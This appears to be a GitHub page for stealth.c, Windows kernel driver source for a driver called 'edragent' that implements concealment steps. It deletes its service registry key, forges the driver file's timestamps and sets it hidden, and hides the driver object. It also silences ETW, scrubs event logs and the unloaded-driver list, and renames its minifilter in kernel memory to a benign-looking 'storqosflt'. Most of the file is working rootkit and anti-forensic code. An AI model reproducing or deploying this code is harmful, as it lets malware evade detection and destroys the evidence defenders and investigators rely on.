-
Notifications
You must be signed in to change notification settings - Fork 5
Expand file tree
/
Copy pathstealth.c
More file actions
420 lines (354 loc) · 12.1 KB
/
Copy pathstealth.c
File metadata and controls
420 lines (354 loc) · 12.1 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
/*
* stealth.c — Optional last-mile concealment helpers.
*
* These actions are best-effort only and must never be required for the
* driver's mandatory startup path. Each step is guarded so remediation/debug
* sessions can skip concealment safely, unsupported surfaces degrade to
* no-op behavior, and the minifilter-specific masquerade stays isolated from
* the rest of the concealment chain.
*/
#include <ntifs.h>
#include <fltKernel.h>
#include <ntstrsafe.h>
#include "edr_shared.h"
#include "core.h"
#include "utils/obj_hide.h"
#include "utils/etw_silence.h"
#include "utils/evtlog_clean.h"
#include "utils/mm_clean.h"
#include "utils/pg_safe.h"
static UNICODE_STRING g_DriverFileName = RTL_CONSTANT_STRING(L"edragent.sys");
static WCHAR g_ServiceKeyPath[256] = { 0 };
typedef struct _STEALTH_CONTEXT {
PDRIVER_OBJECT DriverObject;
BOOLEAN SkipForRemediation;
} STEALTH_CONTEXT, *PSTEALTH_CONTEXT;
typedef NTSTATUS (*STEALTH_STEP_ROUTINE)(_In_ PSTEALTH_CONTEXT Context);
typedef struct _STEALTH_STEP {
PCSTR Name;
BOOLEAN RequiresDriverObject;
BOOLEAN RequiresFilterHandle;
STEALTH_STEP_ROUTINE Routine;
} STEALTH_STEP, *PSTEALTH_STEP;
static VOID StealthLogStepResult(
_In_z_ PCSTR StepName,
_In_z_ PCSTR Result,
_In_ NTSTATUS Status
);
static BOOLEAN StealthShouldSkipForRemediation(VOID);
static BOOLEAN StealthIsSafeSkipStatus(_In_ NTSTATUS Status);
static NTSTATUS StealthRunGuardedStep(
_In_ PSTEALTH_CONTEXT Context,
_In_ const STEALTH_STEP *Step
);
static NTSTATUS StealthRunIndependentSteps(_In_ PSTEALTH_CONTEXT Context);
static NTSTATUS StealthRunMinifilterLastMile(_In_ PSTEALTH_CONTEXT Context);
static NTSTATUS StealthPgSafeMasqueradeModule(_In_ PSTEALTH_CONTEXT Context);
static NTSTATUS StealthDeleteServiceKeyStep(_In_ PSTEALTH_CONTEXT Context);
static NTSTATUS StealthTamperTimestampStep(_In_ PSTEALTH_CONTEXT Context);
static NTSTATUS StealthHideDriverObjectStep(_In_ PSTEALTH_CONTEXT Context);
static NTSTATUS StealthEtwSilenceStep(_In_ PSTEALTH_CONTEXT Context);
static NTSTATUS StealthEvtLogCleanStep(_In_ PSTEALTH_CONTEXT Context);
static NTSTATUS StealthMmCleanStep(_In_ PSTEALTH_CONTEXT Context);
static NTSTATUS StealthMasqueradeMinifilterStep(_In_ PSTEALTH_CONTEXT Context);
static NTSTATUS StealthDeleteServiceKey(VOID);
static NTSTATUS StealthTamperTimestamp(VOID);
static NTSTATUS StealthMasqueradeMinifilter(VOID);
NTSTATUS StealthInitialize(_In_ PDRIVER_OBJECT DriverObject)
{
NTSTATUS status;
NTSTATUS firstFailure = STATUS_SUCCESS;
STEALTH_CONTEXT context;
if (DriverObject == NULL) {
return STATUS_INVALID_PARAMETER;
}
RtlZeroMemory(&context, sizeof(context));
context.DriverObject = DriverObject;
context.SkipForRemediation = StealthShouldSkipForRemediation();
status = RtlStringCbCopyW(
g_ServiceKeyPath,
sizeof(g_ServiceKeyPath),
L"\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Services\\edragent"
);
if (!NT_SUCCESS(status)) {
return status;
}
if (context.SkipForRemediation) {
StealthLogStepResult("global-remediation-guard", "skipped", STATUS_SUCCESS);
return STATUS_SUCCESS;
}
status = StealthRunIndependentSteps(&context);
if (!NT_SUCCESS(status)) {
firstFailure = status;
}
status = StealthRunMinifilterLastMile(&context);
if (!NT_SUCCESS(status) && NT_SUCCESS(firstFailure)) {
firstFailure = status;
}
if (NT_SUCCESS(firstFailure)) {
StealthLogStepResult("initialize", "completed", STATUS_SUCCESS);
}
else {
StealthLogStepResult("initialize", "completed-with-failures", firstFailure);
}
return firstFailure;
}
VOID StealthUninitialize(VOID)
{
}
static VOID StealthLogStepResult(
_In_z_ PCSTR StepName,
_In_z_ PCSTR Result,
_In_ NTSTATUS Status
)
{
DbgPrintEx(
DPFLTR_DEFAULT_ID,
NT_SUCCESS(Status) ? DPFLTR_INFO_LEVEL : DPFLTR_WARNING_LEVEL,
"edragent: stealth %s %s (0x%08X)\n",
StepName,
Result,
Status
);
}
static BOOLEAN StealthShouldSkipForRemediation(VOID)
{
#if DBG
return TRUE;
#else
return FALSE;
#endif
}
static BOOLEAN StealthIsSafeSkipStatus(_In_ NTSTATUS Status)
{
switch (Status) {
case STATUS_SUCCESS:
case STATUS_NOT_SUPPORTED:
case STATUS_INVALID_DEVICE_REQUEST:
case STATUS_NOT_FOUND:
case STATUS_OBJECT_NAME_NOT_FOUND:
case STATUS_OBJECT_PATH_NOT_FOUND:
case STATUS_NO_SUCH_FILE:
case STATUS_NO_SUCH_DEVICE:
return TRUE;
default:
return FALSE;
}
}
static NTSTATUS StealthRunGuardedStep(
_In_ PSTEALTH_CONTEXT Context,
_In_ const STEALTH_STEP *Step
)
{
NTSTATUS status;
if (Context->SkipForRemediation) {
StealthLogStepResult(Step->Name, "skipped-remediation", STATUS_SUCCESS);
return STATUS_SUCCESS;
}
if (Step->RequiresDriverObject && Context->DriverObject == NULL) {
StealthLogStepResult(Step->Name, "skipped-missing-driver-object", STATUS_SUCCESS);
return STATUS_SUCCESS;
}
if (Step->RequiresFilterHandle && g_FilterHandle == NULL) {
StealthLogStepResult(Step->Name, "skipped-missing-filter-handle", STATUS_SUCCESS);
return STATUS_SUCCESS;
}
status = Step->Routine(Context);
if (StealthIsSafeSkipStatus(status)) {
if (NT_SUCCESS(status)) {
StealthLogStepResult(Step->Name, "applied", status);
return STATUS_SUCCESS;
}
StealthLogStepResult(Step->Name, "skipped-unsupported", status);
return STATUS_SUCCESS;
}
StealthLogStepResult(Step->Name, "failed", status);
return status;
}
static NTSTATUS StealthRunIndependentSteps(_In_ PSTEALTH_CONTEXT Context)
{
static const STEALTH_STEP steps[] = {
{ "pgsafe-masquerade-module", TRUE, FALSE, StealthPgSafeMasqueradeModule },
{ "delete-service-key", FALSE, FALSE, StealthDeleteServiceKeyStep },
{ "tamper-driver-timestamp", FALSE, FALSE, StealthTamperTimestampStep },
{ "hide-driver-object", TRUE, FALSE, StealthHideDriverObjectStep },
{ "silence-etw", FALSE, FALSE, StealthEtwSilenceStep },
{ "clean-service-event", FALSE, FALSE, StealthEvtLogCleanStep },
{ "clean-unloaded-drivers", FALSE, FALSE, StealthMmCleanStep }
};
NTSTATUS firstFailure = STATUS_SUCCESS;
NTSTATUS status;
ULONG index;
for (index = 0; index < ARRAYSIZE(steps); index++) {
status = StealthRunGuardedStep(Context, &steps[index]);
if (!NT_SUCCESS(status) && NT_SUCCESS(firstFailure)) {
firstFailure = status;
}
}
return firstFailure;
}
static NTSTATUS StealthRunMinifilterLastMile(_In_ PSTEALTH_CONTEXT Context)
{
static const STEALTH_STEP minifilterStep = {
"masquerade-minifilter-last-mile",
FALSE,
TRUE,
StealthMasqueradeMinifilterStep
};
return StealthRunGuardedStep(Context, &minifilterStep);
}
static NTSTATUS StealthPgSafeMasqueradeModule(_In_ PSTEALTH_CONTEXT Context)
{
return PgSafeMasqueradeModule(Context->DriverObject);
}
static NTSTATUS StealthDeleteServiceKeyStep(_In_ PSTEALTH_CONTEXT Context)
{
UNREFERENCED_PARAMETER(Context);
return StealthDeleteServiceKey();
}
static NTSTATUS StealthTamperTimestampStep(_In_ PSTEALTH_CONTEXT Context)
{
UNREFERENCED_PARAMETER(Context);
return StealthTamperTimestamp();
}
static NTSTATUS StealthHideDriverObjectStep(_In_ PSTEALTH_CONTEXT Context)
{
return ObjHideDriverObject(Context->DriverObject);
}
static NTSTATUS StealthEtwSilenceStep(_In_ PSTEALTH_CONTEXT Context)
{
UNREFERENCED_PARAMETER(Context);
return EtwSilenceInitialize();
}
static NTSTATUS StealthEvtLogCleanStep(_In_ PSTEALTH_CONTEXT Context)
{
UNREFERENCED_PARAMETER(Context);
return EvtLogCleanServiceEvent(L"edragent");
}
static NTSTATUS StealthMmCleanStep(_In_ PSTEALTH_CONTEXT Context)
{
UNICODE_STRING driverName;
UNREFERENCED_PARAMETER(Context);
driverName = g_DriverFileName;
return MmCleanUnloadedDrivers(&driverName);
}
static NTSTATUS StealthMasqueradeMinifilterStep(_In_ PSTEALTH_CONTEXT Context)
{
UNREFERENCED_PARAMETER(Context);
return StealthMasqueradeMinifilter();
}
static NTSTATUS StealthDeleteServiceKey(VOID)
{
NTSTATUS status;
HANDLE keyHandle = NULL;
UNICODE_STRING keyPath;
OBJECT_ATTRIBUTES oa;
RtlInitUnicodeString(&keyPath, g_ServiceKeyPath);
InitializeObjectAttributes(&oa, &keyPath,
OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL);
status = ZwOpenKey(&keyHandle, KEY_ALL_ACCESS, &oa);
if (!NT_SUCCESS(status)) {
return status;
}
WCHAR *subkeys[] = {
L"Instances\\edragent Instance",
L"Enum", L"Security", L"Parameters",
L"Instances"
};
for (ULONG i = 0; i < ARRAYSIZE(subkeys); i++) {
HANDLE subHandle = NULL;
UNICODE_STRING subName;
OBJECT_ATTRIBUTES subOa;
RtlInitUnicodeString(&subName, subkeys[i]);
InitializeObjectAttributes(&subOa, &subName,
OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, keyHandle, NULL);
status = ZwOpenKey(&subHandle, KEY_ALL_ACCESS, &subOa);
if (NT_SUCCESS(status)) {
ZwDeleteKey(subHandle);
ZwClose(subHandle);
}
}
status = ZwDeleteKey(keyHandle);
ZwClose(keyHandle);
return status;
}
static NTSTATUS StealthTamperTimestamp(VOID)
{
NTSTATUS status;
HANDLE fileHandle = NULL;
IO_STATUS_BLOCK iosb;
OBJECT_ATTRIBUTES oa;
UNICODE_STRING filePath;
WCHAR path[] = L"\\SystemRoot\\System32\\drivers\\edragent.sys";
RtlInitUnicodeString(&filePath, path);
InitializeObjectAttributes(&oa, &filePath,
OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, NULL, NULL);
status = ZwOpenFile(
&fileHandle,
FILE_WRITE_ATTRIBUTES | SYNCHRONIZE,
&oa, &iosb,
FILE_SHARE_READ | FILE_SHARE_WRITE,
FILE_SYNCHRONOUS_IO_NONALERT
);
if (!NT_SUCCESS(status)) {
return status;
}
FILE_BASIC_INFORMATION basicInfo = { 0 };
LARGE_INTEGER fakeTime;
fakeTime.QuadPart = 133390080000000000LL;
basicInfo.CreationTime = fakeTime;
basicInfo.LastAccessTime = fakeTime;
basicInfo.LastWriteTime = fakeTime;
basicInfo.ChangeTime = fakeTime;
basicInfo.FileAttributes = FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN;
status = ZwSetInformationFile(
fileHandle, &iosb,
&basicInfo, sizeof(basicInfo),
FileBasicInformation
);
ZwClose(fileHandle);
return status;
}
#define FLT_NAME_SCAN_MAX 0x500
static const WCHAR FAKE_FILTER_NAME[] = L"storqosflt";
static NTSTATUS StealthMasqueradeMinifilter(VOID)
{
if (!g_FilterHandle)
return STATUS_INVALID_PARAMETER;
PUCHAR base = (PUCHAR)g_FilterHandle;
for (ULONG off = 0x10; off < FLT_NAME_SCAN_MAX;
off += sizeof(PVOID)) {
PUNICODE_STRING candidate = (PUNICODE_STRING)(base + off);
__try {
if (candidate->Length == 0 ||
candidate->Length > 260 * sizeof(WCHAR))
continue;
if (candidate->MaximumLength < candidate->Length)
continue;
if ((ULONG_PTR)candidate->Buffer < 0xFFFF800000000000ULL)
continue;
UNICODE_STRING ourName =
RTL_CONSTANT_STRING(L"edragent");
UNICODE_STRING test;
test.Buffer = candidate->Buffer;
test.Length = candidate->Length;
test.MaximumLength = candidate->MaximumLength;
if (RtlEqualUnicodeString(&test, &ourName, TRUE)) {
USHORT fakeLen = sizeof(FAKE_FILTER_NAME)
- sizeof(WCHAR);
if (fakeLen <= candidate->MaximumLength) {
RtlZeroMemory(candidate->Buffer,
candidate->MaximumLength);
RtlCopyMemory(candidate->Buffer,
FAKE_FILTER_NAME, fakeLen);
candidate->Length = fakeLen;
}
return STATUS_SUCCESS;
}
}
__except (EXCEPTION_EXECUTE_HANDLER) {
continue;
}
}
return STATUS_NOT_FOUND;
}